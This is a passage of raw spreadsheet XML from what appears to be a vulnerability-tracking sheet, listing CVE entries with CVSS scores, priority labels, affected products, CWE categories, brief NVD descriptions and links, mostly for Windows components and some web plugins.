t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q844" s="5" t="inlineStr" /><c r="R844" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S844" s="5" t="inlineStr"><is><t>Use after free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T844" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69338</t></is></c></row><row r="845"><c r="A845" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B845" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C845" s="5" t="inlineStr"><is><t>CVE-2026-69340</t></is></c><c r="D845" s="5" t="n"><v>7.1</v></c><c r="E845" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F845" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G845" s="5" t="inlineStr" /><c r="H845" s="5" t="n"><v>0.005</v></c><c r="I845" s="5" t="inlineStr" /><c r="J845" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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5" s="5" t="inlineStr" /><c r="M845" s="5" t="inlineStr" /><c r="N845" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O845" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P845" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q845" s="5" t="inlineStr" /><c r="R845" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S845" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T845" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69340</t></is></c></row><row r="846"><c r="A846" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B846" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C846" s="5" t="inlineStr"><is><t>CVE-2026-69357</t></is></c><c r="D846" s="5" t="n"><v>7.1</v></c><c r="E846" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F846" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G846" s="5" t="inlineStr" /><c r="H846" s="5" t="n"><v>0.004</v></c><c r="I846" s="5" t="inlineStr" /><c r="J846" s="5" t="inlineStr" /><c r="K846" s="5" t="inlineStr" /><c r="L846" s="5" t="inlineStr" /><c r="M846" s="5" t="inlineStr" /><c r="N846" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O846" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P846" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q846" s="5" t="inlineStr" /><c r="R846" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S846" s="5" t="inlineStr"><is><t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T846" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69357</t></is></c></row><row r="847"><c r="A847" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B847" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C847" s="5" t="inlineStr"><is><t>CVE-2026-69358</t></is></c><c r="D847" s="5" t="n"><v>7.1</v></c><c r="E847" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F847" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G847" s="5" t="inlineStr" /><c r="H847" s="5" t="n"><v>0.005</v></c><c r="I847" s="5" t="inlineStr" /><c r="J847" s="5" t="inlineStr" /><c r="K847" s="5" t="inlineStr" /><c r="L847" s="5" t="inlineStr" /><c r="M847" s="5" t="inlineStr" /><c r="N847" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O847" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P847" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q847" s="5" t="inlineStr" /><c r="R847" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S847" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t></is></c><c r="T847" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69358</t></is></c></row><row r="848"><c r="A848" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B848" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C848" s="5" t="inlineStr"><is><t>CVE-2026-69364</t></is></c><c r="D848" s="5" t="n"><v>7.1</v></c><c r="E848" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F848" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G848" s="5" t="inlineStr" /><c r="H848" s="5" t="n"><v>0.005</v></c><c r="I848" s="5" t="inlineStr" /><c r="J848" s="5" t="inlineStr" /><c r="K848" s="5" t="inlineStr" /><c r="L848" s="5" t="inlineStr" /><c r="M848" s="5" t="inlineStr" /><c r="N848" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O848" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P848" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q848" s="5" t="inlineStr" /><c r="R848" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S848" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T848" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69364</t></is></c></row><row r="849"><c r="A849" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B849" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C849" s="5" t="inlineStr"><is><t>CVE-2026-69366</t></is></c><c r="D849" s="5" t="n"><v>7.1</v></c><c r="E849" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F849" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G849" s="5" t="inlineStr" /><c r="H849" s="5" t="n"><v>0.006</v></c><c r="I849" s="5" t="inlineStr" /><c r="J849" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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9" s="5" t="inlineStr" /><c r="M849" s="5" t="inlineStr" /><c r="N849" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O849" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P849" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q849" s="5" t="inlineStr" /><c r="R849" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S849" s="5" t="inlineStr"><is><t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T849" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69366</t></is></c></row><row r="850"><c r="A850" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B850" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C850" s="5" t="inlineStr"><is><t>CVE-2026-69384</t></is></c><c r="D850" s="5" t="n"><v>7.1</v></c><c r="E850" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F850" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G850" s="5" t="inlineStr" /><c r="H850" s="5" t="n"><v>0.004</v></c><c r="I850" s="5" t="inlineStr" /><c r="J850" s="5" t="inlineStr" /><c r="K850" s="5" t="inlineStr" /><c r="L850" s="5" t="inlineStr" /><c r="M850" s="5" t="inlineStr" /><c r="N850" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O850" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P850" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q850" s="5" t="inlineStr" /><c r="R850" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S850" s="5" t="inlineStr"><is><t>Null pointer dereference in Virtual Hard Disk (VHD) Miniport Driver allows an unauthorized attacker to deny service locally.</t></is></c><c r="T850" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69384</t></is></c></row><row r="851"><c r="A851" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B851" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C851" s="5" t="inlineStr"><is><t>CVE-2026-69396</t></is></c><c r="D851" s="5" t="n"><v>7.1</v></c><c r="E851" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F851" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G851" s="5" t="inlineStr" /><c r="H851" s="5" t="n"><v>0.005</v></c><c r="I851" s="5" t="inlineStr" /><c r="J851" s="5" t="inlineStr" /><c r="K851" s="5" t="inlineStr" /><c r="L851" s="5" t="inlineStr" /><c r="M851" s="5" t="inlineStr" /><c r="N851" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O851" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P851" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q851" s="5" t="inlineStr" /><c r="R851" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S851" s="5" t="inlineStr"><is><t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T851" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69396</t></is></c></row><row r="852"><c r="A852" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B852" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C852" s="5" t="inlineStr"><is><t>CVE-2026-69451</t></is></c><c r="D852" s="5" t="n"><v>7.1</v></c><c r="E852" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F852" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G852" s="5" t="inlineStr" /><c r="H852" s="5" t="n"><v>0.007</v></c><c r="I852" s="5" t="inlineStr" /><c r="J852" s="5" t="inlineStr" /><c r="K852" s="5" t="inlineStr" /><c r="L852" s="5" t="inlineStr" /><c r="M852" s="5" t="inlineStr" /><c r="N852" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O852" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P852" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q852" s="5" t="inlineStr" /><c r="R852" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S852" s="5" t="inlineStr"><is><t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T852" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69451</t></is></c></row><row r="853"><c r="A853" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B853" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C853" s="5" t="inlineStr"><is><t>CVE-2026-69460</t></is></c><c r="D853" s="5" t="n"><v>7.1</v></c><c r="E853" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F853" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G853" s="5" t="inlineStr" /><c r="H853" s="5" t="n"><v>0.005</v></c><c r="I853" s="5" t="inlineStr" /><c r="J853" s="5" t="inlineStr" /><c r="K853" s="5" t="inlineStr" /><c r="L853" s="5" t="inlineStr" /><c r="M853" s="5" t="inlineStr" /><c r="N853" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O853" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P853" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q853" s="5" t="inlineStr" /><c r="R853" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S853" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T853" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69460</t></is></c></row><row r="854"><c r="A854" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B854" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C854" s="5" t="inlineStr"><is><t>CVE-2026-69482</t></is></c><c r="D854" s="5" t="n"><v>7.1</v></c><c r="E854" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F854" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G854" s="5" t="inlineStr" /><c r="H854" s="5" t="n"><v>0.003</v></c><c r="I854" s="5" t="inlineStr" /><c r="J854" s="5" t="inlineStr" /><c r="K854" s="5" t="inlineStr" /><c r="L854" s="5" t="inlineStr" /><c r="M854" s="5" t="inlineStr" /><c r="N854" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O854" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P854" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q854" s="5" t="inlineStr" /><c r="R854" s="5" t="inlineStr"><is><t>CWE-379</t></is></c><c r="S854" s="5" t="inlineStr"><is><t>Creation of temporary file in directory with insecure permissions in Windows Error Reporting allows an authorized attacker to perform tampering locally.</t></is></c><c r="T854" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69482</t></is></c></row><row r="855"><c r="A855" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B855" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C855" s="5" t="inlineStr"><is><t>CVE-2026-69536</t></is></c><c r="D855" s="5" t="n"><v>7.1</v></c><c r="E855" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F855" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G855" s="5" t="inlineStr" /><c r="H855" s="5" t="n"><v>0.004</v></c><c r="I855" s="5" t="inlineStr" /><c r="J855" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K855" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L855" s="5" t="inlineStr" /><c r="M855" s="5" t="inlineStr" /><c r="N855" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O855" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P855" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q855" s="5" t="inlineStr" /><c r="R855" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S855" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T855" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69536</t></is></c></row><row r="856"><c r="A856" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B856" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C856" s="5" t="inlineStr"><is><t>CVE-2026-69553</t></is></c><c r="D856" s="5" t="n"><v>7.1</v></c><c r="E856" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F856" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G856" s="5" t="inlineStr" /><c r="H856" s="5" t="n"><v>0.005</v></c><c r="I856" s="5" t="inlineStr" /><c r="J856" s="5" t="inlineStr" /><c r="K856" s="5" t="inlineStr" /><c r="L856" s="5" t="inlineStr" /><c r="M856" s="5" t="inlineStr" /><c r="N856" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O856" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P856" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q856" s="5" t="inlineStr" /><c r="R856" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S856" s="5" t="inlineStr"><is><t>Missing authorization in Windows Hyper-V allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T856" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69553</t></is></c></row><row r="857"><c r="A857" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B857" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C857" s="5" t="inlineStr"><is><t>CVE-2026-69597</t></is></c><c r="D857" s="5" t="n"><v>7.1</v></c><c r="E857" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F857" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G857" s="5" t="inlineStr" /><c r="H857" s="5" t="n"><v>0.006</v></c><c r="I857" s="5" t="inlineStr" /><c r="J857" s="5" t="inlineStr" /><c r="K857" s="5" t="inlineStr" /><c r="L857" s="5" t="inlineStr" /><c r="M857" s="5" t="inlineStr" /><c r="N857" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O857" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P857" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q857" s="5" t="inlineStr" /><c r="R857" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S857" s="5" t="inlineStr"><is><t>Use after free in Windows HTTP.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T857" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69597</t></is></c></row><row r="858"><c r="A858" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B858" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C858" s="5" t="inlineStr"><is><t>CVE-2026-69602</t></is></c><c r="D858" s="5" t="n"><v>7.1</v></c><c r="E858" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F858" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G858" s="5" t="inlineStr" /><c r="H858" s="5" t="n"><v>0.006</v></c><c r="I858" s="5" t="inlineStr" /><c r="J858" s="5" t="inlineStr" /><c r="K858" s="5" t="inlineStr" /><c r="L858" s="5" t="inlineStr" /><c r="M858" s="5" t="inlineStr" /><c r="N858" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O858" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P858" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q858" s="5" t="inlineStr" /><c r="R858" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S858" s="5" t="inlineStr"><is><t>Use after free in Windows PrintWorkflowUserSvc allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T858" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69602</t></is></c></row><row r="859"><c r="A859" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B859" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C859" s="5" t="inlineStr"><is><t>CVE-2026-69688</t></is></c><c r="D859" s="5" t="n"><v>7.1</v></c><c r="E859" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F859" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G859" s="5" t="inlineStr" /><c r="H859" s="5" t="n"><v>0.006</v></c><c r="I859" s="5" t="inlineStr" /><c r="J859" s="5" t="inlineStr" /><c r="K859" s="5" t="inlineStr" /><c r="L859" s="5" t="inlineStr" /><c r="M859" s="5" t="inlineStr" /><c r="N859" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O859" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P859" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q859" s="5" t="inlineStr" /><c r="R859" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S859" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T859" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69688</t></is></c></row><row r="860"><c r="A860" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B860" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C860" s="5" t="inlineStr"><is><t>CVE-2026-69706</t></is></c><c r="D860" s="5" t="n"><v>7.1</v></c><c r="E860" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F860" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G860" s="5" t="inlineStr" /><c r="H860" s="5" t="n"><v>0.004</v></c><c r="I860" s="5" t="inlineStr" /><c r="J860" s="5" t="inlineStr" /><c r="K860" s="5" t="inlineStr" /><c r="L860" s="5" t="inlineStr" /><c r="M860" s="5" t="inlineStr" /><c r="N860" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O860" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P860" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q860" s="5" t="inlineStr" /><c r="R860" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S860" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T860" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69706</t></is></c></row><row r="861"><c r="A861" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B861" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C861" s="5" t="inlineStr"><is><t>CVE-2026-69757</t></is></c><c r="D861" s="5" t="n"><v>7.1</v></c><c r="E861" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F861" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G861" s="5" t="inlineStr" /><c r="H861" s="5" t="n"><v>0.007</v></c><c r="I861" s="5" t="inlineStr" /><c r="J861" s="5" t="inlineStr" /><c r="K861" s="5" t="inlineStr" /><c r="L861" s="5" t="inlineStr" /><c r="M861" s="5" t="inlineStr" /><c r="N861" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O861" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P861" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q861" s="5" t="inlineStr" /><c r="R861" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S861" s="5" t="inlineStr"><is><t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T861" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69757</t></is></c></row><row r="862"><c r="A862" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B862" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C862" s="5" t="inlineStr"><is><t>CVE-2026-69761</t></is></c><c r="D862" s="5" t="n"><v>7.1</v></c><c r="E862" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F862" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G862" s="5" t="inlineStr" /><c r="H862" s="5" t="n"><v>0.005</v></c><c r="I862" s="5" t="inlineStr" /><c r="J862" s="5" t="inlineStr" /><c r="K862" s="5" t="inlineStr" /><c r="L862" s="5" t="inlineStr" /><c r="M862" s="5" t="inlineStr" /><c r="N862" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O862" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P862" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q862" s="5" t="inlineStr" /><c r="R862" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S862" s="5" t="inlineStr"><is><t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T862" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69761</t></is></c></row><row r="863"><c r="A863" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B863" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C863" s="5" t="inlineStr"><is><t>CVE-2026-69775</t></is></c><c r="D863" s="5" t="n"><v>7.1</v></c><c r="E863" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F863" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G863" s="5" t="inlineStr" /><c r="H863" s="5" t="n"><v>0.005</v></c><c r="I863" s="5" t="inlineStr" /><c r="J863" s="5" t="inlineStr" /><c r="K863" s="5" t="inlineStr" /><c r="L863" s="5" t="inlineStr" /><c r="M863" s="5" t="inlineStr" /><c r="N863" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O863" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P863" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q863" s="5" t="inlineStr" /><c r="R863" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S863" s="5" t="inlineStr"><is><t>Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T863" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69775</t></is></c></row><row r="864"><c r="A864" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B864" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C864" s="5" t="inlineStr"><is><t>CVE-2026-73321</t></is></c><c r="D864" s="5" t="n"><v>7.1</v></c><c r="E864" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F864" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G864" s="5" t="inlineStr" /><c r="H864" s="5" t="n"><v>0.004</v></c><c r="I864" s="5" t="inlineStr" /><c r="J864" s="5" t="inlineStr" /><c r="K864" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L864" s="5" t="inlineStr" /><c r="M864" s="5" t="inlineStr" /><c r="N864" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O864" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P864" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q864" s="5" t="inlineStr" /><c r="R864" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="S864" s="5" t="inlineStr"><is><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is></c><c r="T864" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73321</t></is></c></row><row r="865"><c r="A865" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B865" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C865" s="5" t="inlineStr"><is><t>CVE-2026-81781</t></is></c><c r="D865" s="5" t="n"><v>7.1</v></c><c r="E865" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F865" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G865" s="5" t="inlineStr" /><c r="H865" s="5" t="n"><v>0.002</v></c><c r="I865" s="5" t="inlineStr" /><c r="J865" s="5" t="inlineStr" /><c r="K865" s="5" t="inlineStr" /><c r="L865" s="5" t="inlineStr" /><c r="M865" s="5" t="inlineStr" /><c r="N865" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O865" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P865" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q865" s="5" t="inlineStr" /><c r="R865" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S865" s="5" t="inlineStr"><is><t>Missing Authorization vulnerability in Unbounce Unbounce Landing Pages unbounce allows Exploiting Incorrectly Configured Access Control Security Levels.

This issue affects Unbounce Landing Pages: from n/a through 1.1.4.</t></is></c><c r="T865" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81781</t></is></c></row><row r="866"><c r="A866" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B866" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C866" s="5" t="inlineStr"><is><t>CVE-2026-81798</t></is></c><c r="D866" s="5" t="n"><v>7.1</v></c><c r="E866" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F866" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G866" s="5" t="inlineStr" /><c r="H866" s="5" t="n"><v>0.001</v></c><c r="I866" s="5" t="inlineStr" /><c r="J866" s="5" t="inlineStr" /><c r="K866" s="5" t="inlineStr" /><c r="L866" s="5" t="inlineStr" /><c r="M866" s="5" t="inlineStr" /><c r="N866" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O866" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P866" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q866" s="5" t="inlineStr" /><c r="R866" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S866" s="5" t="inlineStr"><is><t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Easy Appointments allows DOM-Based XSS.

This issue affects Easy Appointments: from n/a through 4.0.2.1.</t></is></c><c r="T866" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81798</t></is></c></row><row r="867"><c r="A867" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B867" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C867" s="5" t="inlineStr"><is><t>CVE-2026-82052</t></is></c><c r="D867" s="5" t="n"><v>7.1</v></c><c r="E867" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F867" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G867" s="5" t="inlineStr" /><c r="H867" s="5" t="n"><v>0.004</v></c><c r="I867" s="5" t="inlineStr" /><c r="J867" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K867" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L867" s="5" t="inlineStr" /><c r="M867" s="5" t="inlineStr" /><c r="N867" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O867" s="5" 